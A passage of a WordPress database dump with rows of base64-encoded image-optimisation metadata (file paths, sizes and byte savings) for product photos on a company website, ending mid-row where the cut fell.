INSERT INTO `wp_postmeta` VALUES (29233, 1761, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4uanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDYxNCwiaWQiOiIxNzYxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1ME4tMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjQ2MTYsImlkIjoxNzYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTUwTi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NDYxOSwiaWQiOjE3NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTBOLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY0NjIxLCJpZCI6MTc2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1ME4tMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NDYyNCwiaWQiOjE3NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTBOLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY0NjI3LCJpZCI6MTc2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1ME4tMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjQ2MjksImlkIjoxNzYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTUwTi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NDYzMiwiaWQiOjE3NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTBOLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY0NjM0LCJpZCI6MTc2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTUwTi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NDYzNiwiaWQiOjE3NjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1ME4tMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjQ2NDAsImlkIjoxNzYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTUwTi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01NTBOLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY0NjQyLCJpZCI6MTc2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTUwTi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NDY0NCwiaWQiOjE3NjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01NTBOLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTU1ME4tOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTU1ME4tOTB4OTAuanBnIiwicmVkdWN0aW9uIjoyMzUsInRpbWUiOjE0ODM1NjQ2NDYsImlkIjoxNzYxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29234, 1760, 'wpfc_optimisation_reduction', '27545'); 
INSERT INTO `wp_postmeta` VALUES (29235, 1760, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4uanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDY1MSwiaWQiOiIxNzYwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk1MSwidGltZSI6MTQ4MzU2NDY1NCwiaWQiOjE3NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMjQ2LCJ0aW1lIjoxNDgzNTY0NjU4LCJpZCI6MTc2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI5MTQsInRpbWUiOjE0ODM1NjQ2NjEsImlkIjoxNzYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzYyMCwidGltZSI6MTQ4MzU2NDY2NSwiaWQiOjE3NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDMsInRpbWUiOjE0ODM1NjQ2NjgsImlkIjoxNzYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTM5LCJ0aW1lIjoxNDgzNTY0NjcyLCJpZCI6MTc2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjYyNCwidGltZSI6MTQ4MzU2NDY3NSwiaWQiOjE3NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNTMwTi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy01MzBOLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTU2LCJ0aW1lIjoxNDgzNTY0Njc4LCJpZCI6MTc2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDExLCJ0aW1lIjoxNDgzNTY0NjgyLCJpZCI6MTc2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTUyLCJ0aW1lIjoxNDgzNTY0Njg1LCJpZCI6MTc2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6Njg2LCJ0aW1lIjoxNDgzNTY0Njg5LCJpZCI6MTc2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNTMwTi00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTAxNCwidGltZSI6MTQ4MzU2NDY5MiwiaWQiOjE3NjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy01MzBOLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTUzME4tOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTUzME4tOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODksInRpbWUiOjE0ODM1NjQ2OTYsImlkIjoxNzYwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29236, 1759, 'wpfc_optimisation_reduction', '22108'); 
INSERT INTO `wp_postmeta` VALUES (29237, 1759, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDc3Qy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3N0MuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDcwMCwiaWQiOiIxNzU5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzdDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYW